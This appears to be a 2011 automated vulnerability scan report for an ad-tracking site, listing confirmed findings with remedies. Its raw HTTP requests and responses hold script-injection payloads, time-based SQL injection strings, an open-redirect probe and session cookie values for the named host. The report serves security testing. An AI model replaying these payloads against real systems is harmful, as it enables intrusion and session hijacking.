<br>Error Description:Incorrect syntax near '173.193'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1860, @bannerCreativeAdModuleId = 21152, @campaignId = 6330, @syndicationOutletId = 47146, @adrotationId = '"--></style></script><script>netsparker(0x000016)</script>, @ipAddress = '173.193.214.243', @sessionId = '753209146', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @browserName = 'IE', @browserVersion = '6.0', @domain = 'undefined', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)', @segment = 'undefined'<br>Local Req By:undefined<br>Ref:undefined
Cache-Control: private
Content-Type: text/html
Date: Sat, 12 Feb 2011 20:10:51 GMT
Expires: Sat, 12 Feb 2011 20:10:52 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 691
Connection: keep-alive
<br>Error Description:Incorrect syntax near '173.193'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1860, @bannerCreativeAdModuleId = 21152, @campaignId = 6330, @syndicationOutletId = 47146, @adrotationId = '"--></style></script><script>netsparker(0x000016)</script>, @ipAddress = '173.193.214.243', @sessionId = '753209146', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @browserName = 'IE', @browserVersion = '6.0', @domain = 'undefined', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)', @segment = 'undefined'<br>Local Req By:undefined<br>Ref:undefined
|
- /Tracking/V2/BannerCreative/Impression/
/Tracking/V2/BannerCreative/Impression/ CONFIRMED |
Parameters
| Parameter | Type | Value |
| siteId | GET | 1860 |
| syndicationOutletId | GET | 47146 |
| campaignId | GET | 6330 |
| adRotationId | GET | 15121 |
| bannerCreativeAdModuleId | GET | '"--></style></script><script>alert(0x000017)</script> |
| redirect | GET | http://ar.voicefive.com/b/recruitBeacon.pli?pid=p84532700&PRAd=47146&AR_C=34917 |
Request
GET /Tracking/V2/BannerCreative/Impression/?siteId=1860&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000017)%3C/script%3E&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=JKJHBCNCLHKGJJHFAHOMACIO; ASPSESSIONIDQAAADSBA=KKINFANCHKMLDLPEOJAPLNEP; ASPSESSIONIDCQCBDRCC=ANGGEANCLALAPHCKIMHHLJAG; ASPSESSIONIDAQRDQQSA=MNHMIFNCNEHLNDLKKFJDJMPH; ASPSESSIONIDSCCQQTSD=AACKOFNCEDOGOCAFHCKMFDIP; ASPSESSIONIDACBASSRC=PLOONFNCJHCMNCNOPBMGNDKL; ASPSESSIONIDCAADQSTC=IMEHOFNCKCHHEBIBFNAFLKGI; ASPSESSIONIDSATQDCAA=ONNDFNMCPDKDBAMJKCPJGFHP; ASPSESSIONIDSCSRCAAA=IABBGKMCHOAMPHNBCGKHNMCJ; ASPSESSIONIDQCCDATDD=EOAPLANCJPFAGDNGFFADBKNK; ASPSESSIONIDCARBCQCA=ICPFEOMCJKNBCMBJDEMHCJJO; ASPSESSIONIDQARQBACA=GMAHEOMCKKKBLCPFLFNEKKNM; ASPSESSIONIDCQCDBSCB=OHJGIOMCIBNNDHOKBCACPBIA; ASPSESSIONIDSCTBDRTA=BECEIOMCFENLEBKNIKGAMDDJ; ASPSESSIONIDQCSSCCBA=BLAJNNMCMCBFFHOBOOJDKKPJ; ASPSESSIONIDASRADQQC=GKKGOFNCEGMFDHJIJAJHMLAJ; ASPSESSIONIDCSCAASBD=AMBGEBNCCOKCADHLFKFBGPEH; ASPSESSIONIDSQSTQBAA=IIMKLANCMIFANJFBINLEOFKF; ASPSESSIONIDCSQRRDDD=IDJCEANCGLCFPGHCBNNOIDNI
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=JKJHBCNCLHKGJJHFAHOMACIO; ASPSESSIONIDQAAADSBA=KKINFANCHKMLDLPEOJAPLNEP; ASPSESSIONIDCQCBDRCC=ANGGEANCLALAPHCKIMHHLJAG; ASPSESSIONIDAQRDQQSA=MNHMIFNCNEHLNDLKKFJDJMPH; ASPSESSIONIDSCCQQTSD=AACKOFNCEDOGOCAFHCKMFDIP; ASPSESSIONIDACBASSRC=PLOONFNCJHCMNCNOPBMGNDKL; ASPSESSIONIDCAADQSTC=IMEHOFNCKCHHEBIBFNAFLKGI; ASPSESSIONIDSATQDCAA=ONNDFNMCPDKDBAMJKCPJGFHP; ASPSESSIONIDSCSRCAAA=IABBGKMCHOAMPHNBCGKHNMCJ; ASPSESSIONIDQCCDATDD=EOAPLANCJPFAGDNGFFADBKNK; ASPSESSIONIDCARBCQCA=ICPFEOMCJKNBCMBJDEMHCJJO; ASPSESSIONIDQARQBACA=GMAHEOMCKKKBLCPFLFNEKKNM; ASPSESSIONIDCQCDBSCB=OHJGIOMCIBNNDHOKBCACPBIA; ASPSESSIONIDSCTBDRTA=BECEIOMCFENLEBKNIKGAMDDJ; ASPSESSIONIDQCSSCCBA=BLAJNNMCMCBFFHOBOOJDKKPJ; ASPSESSIONIDASRADQQC=GKKGOFNCEGMFDHJIJAJHMLAJ; ASPSESSIONIDCSCAASBD=AMBGEBNCCOKCADHLFKFBGPEH; ASPSESSIONIDSQSTQBAA=IIMKLANCMIFANJFBINLEOFKF; ASPSESSIONIDCSQRRDDD=IDJCEANCGLCFPGHCBNNOIDNI
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sat, 12 Feb 2011 20:10:49 GMT
Expires: Sat, 12 Feb 2011 20:10:49 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 691
Connection: keep-alive
<br>Error Description:Incorrect syntax near '173.193'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1860, @bannerCreativeAdModuleId = '"--></style></script><script>netsparker(0x000017)</script>, @campaignId = 6330, @syndicationOutletId = 47146, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '761202596', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @browserName = 'IE', @browserVersion = '6.0', @domain = 'undefined', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)', @segment = 'undefined'<br>Local Req By:undefined<br>Ref:undefined
Cache-Control: private
Content-Type: text/html
Date: Sat, 12 Feb 2011 20:10:49 GMT
Expires: Sat, 12 Feb 2011 20:10:49 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 691
Connection: keep-alive
<br>Error Description:Incorrect syntax near '173.193'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1860, @bannerCreativeAdModuleId = '"--></style></script><script>netsparker(0x000017)</script>, @campaignId = 6330, @syndicationOutletId = 47146, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '761202596', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @browserName = 'IE', @browserVersion = '6.0', @domain = 'undefined', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)', @segment = 'undefined'<br>Local Req By:undefined<br>Ref:undefined
Open Policy Crossdomain.xml Identified
Open Policy Crossdomain.xml Identified
1
TOTAL
MEDIUM
CONFIRMED
1
Netsparker identified Open Policy Crossdomain.xml file.
Impact
Open Policy Crossdomain.xml file allows other SWF files to make HTTP requests to your web server and see its response. This can be used for accessing one time tokens and CSRF nonces to bypass CSRF restrictions.
Remedy
Configure your Crossdomain.xml to prevent access from everywhere to your domain.
External References
|
- /crossdomain.xml
/crossdomain.xml CONFIRMED |
Policy Rules
- <allow-access-from domain="*" secure="false" />
Request
GET /crossdomain.xml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=GCJHBCNCEDMJHCBGOPJBPJIH
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=GCJHBCNCEDMJHCBGOPJBPJIH
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Encoding:
Content-Type: text/xml
Date: Sat, 12 Feb 2011 20:10:40 GMT
ETag: "805ceb645b5fcb1:0"
Last-Modified: Tue, 28 Sep 2010 22:20:45 GMT
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 191
Connection: keep-alive
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>
Accept-Ranges: bytes
Content-Encoding:
Content-Type: text/xml
Date: Sat, 12 Feb 2011 20:10:40 GMT
ETag: "805ceb645b5fcb1:0"
Last-Modified: Tue, 28 Sep 2010 22:20:45 GMT
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 191
Connection: keep-alive
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>
Open Redirection
Open Redirection
1
TOTAL
MEDIUM
CONFIRMED
1
Open Redirection occurs when vulnerable web page is being redirected to another web page via a user controllable input.
Impact
An attacker can use this vulnerability to redirect users to other malicious web sites which can be used for phishing and similar attacks.
Remedy
- Where possible do not use users' input for URLs.
- If you definitely need dynamic URLs, Make a list of valid accepted URLs and do not accept other URLs.
- Ensure that you only accept URLs which are located on accepted domains.
External References
|
- /Tracking/V2/BannerCreative/Impression/
/Tracking/V2/BannerCreative/Impression/ CONFIRMED |
Parameters
| Parameter | Type | Value |
| siteId | GET | 1860 |
| syndicationOutletId | GET | 47146 |
| campaignId | GET | 6330 |
| adRotationId | GET | 15121 |
| bannerCreativeAdModuleId | GET | 21152 |
| redirect | GET | http://www.netsparker.com? |
Request
GET /Tracking/V2/BannerCreative/Impression/?siteId=1860&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://www.netsparker.com? HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=GCJHBCNCEDMJHCBGOPJBPJIH; ASPSESSIONIDQAAADSBA=HIINFANCHFBLCJFCFEFNMOEC; ASPSESSIONIDCQCBDRCC=DKGGEANCJLOCCBCIDAOMLFHK; ASPSESSIONIDAQRDQQSA=DNHMIFNCKEOJJDDGFACILHGE; ASPSESSIONIDSCCQQTSD=BPBKOFNCFIKEKJBNOBINOEAA; ASPSESSIONIDACBASSRC=IJOONFNCKDCDHPFJPMJCJJMN; ASPSESSIONIDCAADQSTC=BLEHOFNCAIJNFGHLABMKDIHM; ASPSESSIONIDSATQDCAA=LMNDFNMCBGCMEPFMEOKPALAP; ASPSESSIONIDSCSRCAAA=IABBGKMCHOAMPHNBCGKHNMCJ; ASPSESSIONIDQCCDATDD=PMAPLANCIGANJGIMOEECGMED; ASPSESSIONIDCARBCQCA=ICPFEOMCJKNBCMBJDEMHCJJO; ASPSESSIONIDQARQBACA=OLAHEOMCOLAOLKEMGGLPAFLB; ASPSESSIONIDCQCDBSCB=GFJGIOMCPDPCGDMKLKBAHHPA; ASPSESSIONIDSCTBDRTA=BECEIOMCFENLEBKNIKGAMDDJ; ASPSESSIONIDQCSSCCBA=ALAJNNMCHEEKKFAEEFKGOGHO; ASPSESSIONIDASRADQQC=KHKGOFNCLKFAGEAFJFIJKGMH; ASPSESSIONIDCSCAASBD=OJBGEBNCCNPIBIKLFCLBMNHF; ASPSESSIONIDSQSTQBAA=BGMKLANCDAABMFICMLOACMBB
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=GCJHBCNCEDMJHCBGOPJBPJIH; ASPSESSIONIDQAAADSBA=HIINFANCHFBLCJFCFEFNMOEC; ASPSESSIONIDCQCBDRCC=DKGGEANCJLOCCBCIDAOMLFHK; ASPSESSIONIDAQRDQQSA=DNHMIFNCKEOJJDDGFACILHGE; ASPSESSIONIDSCCQQTSD=BPBKOFNCFIKEKJBNOBINOEAA; ASPSESSIONIDACBASSRC=IJOONFNCKDCDHPFJPMJCJJMN; ASPSESSIONIDCAADQSTC=BLEHOFNCAIJNFGHLABMKDIHM; ASPSESSIONIDSATQDCAA=LMNDFNMCBGCMEPFMEOKPALAP; ASPSESSIONIDSCSRCAAA=IABBGKMCHOAMPHNBCGKHNMCJ; ASPSESSIONIDQCCDATDD=PMAPLANCIGANJGIMOEECGMED; ASPSESSIONIDCARBCQCA=ICPFEOMCJKNBCMBJDEMHCJJO; ASPSESSIONIDQARQBACA=OLAHEOMCOLAOLKEMGGLPAFLB; ASPSESSIONIDCQCDBSCB=GFJGIOMCPDPCGDMKLKBAHHPA; ASPSESSIONIDSCTBDRTA=BECEIOMCFENLEBKNIKGAMDDJ; ASPSESSIONIDQCSSCCBA=ALAJNNMCHEEKKFAEEFKGOGHO; ASPSESSIONIDASRADQQC=KHKGOFNCLKFAGEAFJFIJKGMH; ASPSESSIONIDCSCAASBD=OJBGEBNCCNPIBIKLFCLBMNHF; ASPSESSIONIDSQSTQBAA=BGMKLANCDAABMFICMLOACMBB
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 302 Object moved
Cache-Control: private
Content-Type: text/html
Date: Sat, 12 Feb 2011 20:10:46 GMT
Expires: Sat, 12 Feb 2011 20:10:46 GMT
Location: http://www.netsparker.com?
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 147
Connection: keep-alive
<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://www.netsparker.com?">here</a>.</body>
Cache-Control: private
Content-Type: text/html
Date: Sat, 12 Feb 2011 20:10:46 GMT
Expires: Sat, 12 Feb 2011 20:10:46 GMT
Location: http://www.netsparker.com?
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 147
Connection: keep-alive
<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://www.netsparker.com?">here</a>.</body>
Cookie Not Marked As HttpOnly
Cookie Not Marked As HttpOnly
1
TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..
Impact
During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.Actions to Take
- See the remedy for solution
- Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.
Remedy
Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.
External References
|
- /Tracking/V2/BannerCreative/Impression/
/Tracking/V2/BannerCreative/Impression/ CONFIRMED |
Identified Cookie
ASPSESSIONIDCQSSSADD
Request
GET /Tracking/V2/BannerCreative/Impression/?siteId=1860&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 302 Object moved
Cache-Control: private
Content-Type: text/html
Date: Sat, 12 Feb 2011 20:10:40 GMT
Expires: Sat, 12 Feb 2011 20:10:41 GMT
Location: http://ar.voicefive.com/b/recruitBeacon.pli?pid=p84532700&PRAd=47146&AR_C=34917
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCQSSSADD=GCJHBCNCEDMJHCBGOPJBPJIH; path=/
X-Powered-By: ASP.NET
Content-Length: 208
Connection: keep-alive
<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://ar.voicefive.com/b/recruitBeacon.pli?pid=p84532700&PRAd=47146&AR_C=34917">here</a>.</body>
Cache-Control: private
Content-Type: text/html
Date: Sat, 12 Feb 2011 20:10:40 GMT
Expires: Sat, 12 Feb 2011 20:10:41 GMT
Location: http://ar.voicefive.com/b/recruitBeacon.pli?pid=p84532700&PRAd=47146&AR_C=34917
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCQSSSADD=GCJHBCNCEDMJHCBGOPJBPJIH; path=/
X-Powered-By: ASP.NET
Content-Length: 208
Connection: keep-alive
<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://ar.voicefive.com/b/recruitBeacon.pli?pid=p84532700&PRAd=47146&AR_C=34917">here</a>.</body>
Database Error Message
Database Error Message
1
TOTAL
LOW
Netsparker identified a database error message.
Impact
The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.
Remedy
Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.
|
- /Tracking/V2/BannerCreative/Impression/
/Tracking/V2/BannerCreative/Impression/ |
Parameters
| Parameter | Type | Value |
| siteId | GET | ';WAITFOR DELAY '0:0:25'-- |
| syndicationOutletId | GET | 47146 |
| campaignId | GET | 6330 |
| adRotationId | GET | 15121 |
| bannerCreativeAdModuleId | GET | 21152 |
| redirect | GET | http://ar.voicefive.com/b/recruitBeacon.pli?pid=p84532700&PRAd=47146&AR_C=34917 |
Request
GET /Tracking/V2/BannerCreative/Impression/?siteId=%27;WAITFOR%20DELAY%20%270:0:25%27--&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=GCJHBCNCEDMJHCBGOPJBPJIH
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=GCJHBCNCEDMJHCBGOPJBPJIH
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sat, 12 Feb 2011 20:10:44 GMT
Expires: Sat, 12 Feb 2011 20:10:45 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCQCBDRCC=DKGGEANCJLOCCBCIDAOMLFHK; path=/
X-Powered-By: ASP.NET
Content-Length: 653
Connection: keep-alive
<br>Error Description:Incorrect syntax near '0'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = ';WAITFOR DELAY '0:0:25'--, @bannerCreativeAdModuleId = 21152, @campaignId = 6330, @syndicationOutletId = 47146, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '755303904', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @browserName = 'IE', @browserVersion = '6.0', @domain = 'undefined', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)', @segment = 'undefined'<br>Local Req By:undefined<br>Ref:undefined
Cache-Control: private
Content-Type: text/html
Date: Sat, 12 Feb 2011 20:10:44 GMT
Expires: Sat, 12 Feb 2011 20:10:45 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCQCBDRCC=DKGGEANCJLOCCBCIDAOMLFHK; path=/
X-Powered-By: ASP.NET
Content-Length: 653
Connection: keep-alive
<br>Error Description:Incorrect syntax near '0'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = ';WAITFOR DELAY '0:0:25'--, @bannerCreativeAdModuleId = 21152, @campaignId = 6330, @syndicationOutletId = 47146, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '755303904', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @browserName = 'IE', @browserVersion = '6.0', @domain = 'undefined', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)', @segment = 'undefined'<br>Local Req By:undefined<br>Ref:undefined
Microsoft SQL Server Identified
Microsoft SQL Server Identified
1
TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the target web site is using Microsoft SQL Server as backend database. This issue is reported for information purposes only.
Impact
This issue is reported as additional information only, there is no direct impact arising from this issue.
|
- /Tracking/V2/BannerCreative/Impression/
/Tracking/V2/BannerCreative/Impression/ CONFIRMED |
Request
GET /Tracking/V2/BannerCreative/Impression/?siteId=1;WAITFOR%20DELAY%20%270:0:25%27--&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=GCJHBCNCEDMJHCBGOPJBPJIH; ASPSESSIONIDQAAADSBA=HIINFANCHFBLCJFCFEFNMOEC; ASPSESSIONIDCQCBDRCC=DKGGEANCJLOCCBCIDAOMLFHK
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=GCJHBCNCEDMJHCBGOPJBPJIH; ASPSESSIONIDQAAADSBA=HIINFANCHFBLCJFCFEFNMOEC; ASPSESSIONIDCQCBDRCC=DKGGEANCJLOCCBCIDAOMLFHK
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sat, 12 Feb 2011 20:11:09 GMT
Expires: Sat, 12 Feb 2011 20:10:45 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCSQRRDDD=EDJCEANCLPKGGNJLHBHNGIOD; path=/
X-Powered-By: ASP.NET
Content-Length: 742
Connection: keep-alive
<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1;WAITFOR DELAY '0:0:25'--, @bannerCreativeAdModuleId = 21152, @campaignId = 6330, @syndicationOutletId = 47146, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '755286999', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @browserName = 'IE', @browserVersion = '6.0', @domain = 'undefined', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)', @segment = 'undefined'<br>Local Req By:undefined<br>Ref:undefined
Cache-Control: private
Content-Type: text/html
Date: Sat, 12 Feb 2011 20:11:09 GMT
Expires: Sat, 12 Feb 2011 20:10:45 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCSQRRDDD=EDJCEANCLPKGGNJLHBHNGIOD; path=/
X-Powered-By: ASP.NET
Content-Length: 742
Connection: keep-alive
<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1;WAITFOR DELAY '0:0:25'--, @bannerCreativeAdModuleId = 21152, @campaignId = 6330, @syndicationOutletId = 47146, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '755286999', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @browserName = 'IE', @browserVersion = '6.0', @domain = 'undefined', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)', @segment = 'undefined'<br>Local Req By:undefined<br>Ref:undefined
E-mail Address Disclosure
E-mail Address Disclosure
1
TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.
Impact
E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .
Remedy
Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.
External References
|
- /robots.txt
/robots.txt |
Found E-mails
support@vindicogroup.com
Request
GET /robots.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=GCJHBCNCEDMJHCBGOPJBPJIH
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: trk.vindicosuite.com
Cookie: ASPSESSIONIDSQSQRBBB=JIBHLANCLJAPOFLLDILECINC; ASPSESSIONIDCQSSSADD=GCJHBCNCEDMJHCBGOPJBPJIH
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Sat, 12 Feb 2011 20:10:42 GMT
ETag: "5dd76016e8a6cb1:0"
Last-Modified: Tue, 28 Dec 2010 23:36:44 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 139
Connection: keep-alive
# /robots.txt file for http://vindicosuite.com/
# mail support@vindicogroup.com for constructive criticism
User-agent: *
Disallow: /
Accept-Ranges: bytes
Content-Type: text/plain
Date: Sat, 12 Feb 2011 20:10:42 GMT
ETag: "5dd76016e8a6cb1:0"
Last-Modified: Tue, 28 Dec 2010 23:36:44 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 139
Connection: keep-alive
# /robots.txt file for http://vindicosuite.com/
# mail support@vindicogroup.com for constructive criticism
User-agent: *
Disallow: /
IIS Version Disclosure
IIS Version Disclosure
1
TOTAL
INFORMATION
Netsparker identified that the target web server is disclosing the web server's version in the HTTP response. This information can help an attacker to gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.
Impact
An attacker can look for specific security vulnerabilities for the version identified through the SERVER header information.
Remediation
Configure your web server to prevent information leakage from the
SERVER header of its HTTP response.
|
- /robots.txt
/robots.txt |
Extracted Version
Microsoft-IIS/7.0
Request
GET /robots.txt HTTP/1.1
